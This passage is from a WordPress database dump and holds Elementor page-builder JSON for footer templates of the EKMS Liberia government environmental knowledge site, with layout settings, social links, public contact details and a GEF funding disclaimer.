Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":6.389},\"elements\":[{\"id\":\"da6e6b3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/white_bg_seal.png\",\"id\":371,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":37.035,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.983},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":50.593,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":14.472},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":34.283},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":50.578},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(25845,3808,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(25849,3809,'_elementor_edit_mode','builder'),(25850,3809,'_elementor_template_type','footer'),(25851,3809,'_elementor_version','3.3.1'),(25852,3809,'_elementor_pro_version','3.3.6'),(25853,3809,'_wp_page_template','default'),(25854,3809,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}]},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.147},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":6.389},\"elements\":[{\"id\":\"da6e6b3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/white_bg_seal.png\",\"id\":371,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":37.035,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.983},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/gef_logo.jpg\",\"id\":92,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":50.593,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":14.38},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":49.204,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(25856,3809,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(25859,3810,'_elementor_edit_mode','builder'),(25860,3810,'_elementor_template_type','footer'),(25861,3810,'_elementor_version','3.3.1'),(25862,3810,'_elementor_pro_version','3.3.6'),(25863,3810,'_wp_page_template','default'),(25864,3810,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}]},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.91},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.991,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"#\\\">Join here!<\\/a><\\/span><\\/p>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.927},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This 